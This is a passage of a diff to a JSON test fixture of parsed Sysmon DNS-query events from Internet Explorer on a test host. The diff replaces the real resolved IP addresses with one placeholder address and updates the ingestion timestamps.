ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.056\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eimg-s-msn-com.akamaized.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a1834.dspg2.akamai.net;::ffff:23.50.53.185;::ffff:23.50.53.194;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:06.051902900Z'/\u003e\u003cEventRecordID\u003e167\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.056\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eimg-s-msn-com.akamaized.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a1834.dspg2.akamai.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:06.051Z", @@ -14983,17 +14810,17 @@ "type": "CNAME" }, { - "data": "23.50.53.194", + "data": "89.160.20.156", "type": "A" }, { - "data": "23.50.53.186", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "23.50.53.194", - "23.50.53.186" + "89.160.20.156", + "89.160.20.156" ] }, "network": { 
@@ -15009,14 +14836,13 @@ "static-entertainment-eus-s-msn-com.akamaized.net" ], "ip": [ - "23.50.53.194", - "23.50.53.186" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313928518Z", + "ingested": "2021-12-09T13:49:44.739808Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:07.049319700Z'/\u003e\u003cEventRecordID\u003e168\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.064\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatic-entertainment-eus-s-msn-com.akamaized.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a1505.g2.akamai.net;::ffff:23.50.53.194;::ffff:23.50.53.186;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:07.049319700Z'/\u003e\u003cEventRecordID\u003e168\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.064\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatic-entertainment-eus-s-msn-com.akamaized.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a1505.g2.akamai.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:07.049Z", @@ -15084,12 +14910,12 @@ "type": "CNAME" }, { - "data": "23.217.149.91", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "23.217.149.91" + "89.160.20.156" ] }, "network": { 
@@ -15106,13 +14932,13 @@ "radarmaps.weather.microsoft.com" ], "ip": [ - "23.217.149.91" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313929844Z", + "ingested": "2021-12-09T13:49:44.739811800Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:07.049334900Z'/\u003e\u003cEventRecordID\u003e169\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.178\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eradarmaps.weather.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 radarmaps.weather.microsoft.com.edgekey.net;type: 5 e15275.g.akamaiedge.net;::ffff:23.217.149.91;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:07.049334900Z'/\u003e\u003cEventRecordID\u003e169\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.178\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eradarmaps.weather.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 radarmaps.weather.microsoft.com.edgekey.net;type: 5 e15275.g.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:07.049Z", @@ -15176,17 +15002,17 @@ "type": "CNAME" }, { - "data": "23.50.53.194", + "data": "89.160.20.156", "type": "A" }, { - "data": "23.50.53.186", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "23.50.53.194", - "23.50.53.186" + "89.160.20.156", + "89.160.20.156" ] }, "network": { 
@@ -15202,14 +15028,13 @@ "static-entertainment-eus-s-msn-com.akamaized.net" ], "ip": [ - "23.50.53.194", - "23.50.53.186" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313931151Z", + "ingested": "2021-12-09T13:49:44.739816200Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:07.049349000Z'/\u003e\u003cEventRecordID\u003e170\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.455\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a8-5d2f-0000-001094619900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e356\u003c/Data\u003e\u003cData Name='QueryName'\u003estatic-entertainment-eus-s-msn-com.akamaized.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a1505.g2.akamai.net;::ffff:23.50.53.194;::ffff:23.50.53.186;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:07.049349000Z'/\u003e\u003cEventRecordID\u003e170\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.455\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a8-5d2f-0000-001094619900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e356\u003c/Data\u003e\u003cData Name='QueryName'\u003estatic-entertainment-eus-s-msn-com.akamaized.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a1505.g2.akamai.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:07.049Z", @@ -15273,12 +15098,12 @@ "type": "CNAME" }, { - "data": "152.195.32.163", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "152.195.32.163" + "89.160.20.156" ] }, "network": { 
@@ -15294,13 +15119,13 @@ "tag.sp.advertising.com" ], "ip": [ - "152.195.32.163" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313932407Z", + "ingested": "2021-12-09T13:49:44.739822Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:07.049364200Z'/\u003e\u003cEventRecordID\u003e171\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.494\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etag.sp.advertising.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cs747173190.wac.omegacdn.net;::ffff:152.195.32.163;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:07.049364200Z'/\u003e\u003cEventRecordID\u003e171\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.494\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etag.sp.advertising.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cs747173190.wac.omegacdn.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:07.049Z", @@ -15368,17 +15193,17 @@ "type": "CNAME" }, { - "data": "204.79.197.200", + "data": "89.160.20.156", "type": "A" }, { - "data": "13.107.21.200", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "204.79.197.200", - "13.107.21.200" + "89.160.20.156", + "89.160.20.156" ] }, "network": { 
@@ -15395,14 +15220,13 @@ "www.bing.com" ], "ip": [ - "204.79.197.200", - "13.107.21.200" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313933804Z", + "ingested": "2021-12-09T13:49:44.739826Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:07.049377200Z'/\u003e\u003cEventRecordID\u003e172\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.567\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ewww.bing.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a-0001.a-afdentry.net.trafficmanager.net;type: 5 dual-a-0001.a-msedge.net;::ffff:204.79.197.200;::ffff:13.107.21.200;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:07.049377200Z'/\u003e\u003cEventRecordID\u003e172\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.567\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ewww.bing.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a-0001.a-afdentry.net.trafficmanager.net;type: 5 dual-a-0001.a-msedge.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:07.049Z", @@ -15470,12 +15294,12 @@ "type": "CNAME" }, { - "data": "23.52.164.109", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "23.52.164.109" + "89.160.20.156" ] }, "network": { 
@@ -15492,13 +15316,13 @@ "cdn.doubleverify.com" ], "ip": [ - "23.52.164.109" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313935377Z", + "ingested": "2021-12-09T13:49:44.739829900Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054270200Z'/\u003e\u003cEventRecordID\u003e173\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.228\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecdn.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 akacdn.doubleverify.com.edgekey.net;type: 5 e17513.d.akamaiedge.net;::ffff:23.52.164.109;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054270200Z'/\u003e\u003cEventRecordID\u003e173\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.228\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecdn.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 akacdn.doubleverify.com.edgekey.net;type: 5 e17513.d.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:08.054Z", @@ -15577,12 +15401,12 @@ "type": "CNAME" }, { - "data": "23.52.164.109", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "23.52.164.109" + "89.160.20.156" ] }, "network": { 
@@ -15600,13 +15424,13 @@ "cdn3.doubleverify.com" ], "ip": [ - "23.52.164.109" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313936765Z", + "ingested": "2021-12-09T13:49:44.739833300Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054302600Z'/\u003e\u003cEventRecordID\u003e174\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:07.357\u003c/Data\u003e\u003cData 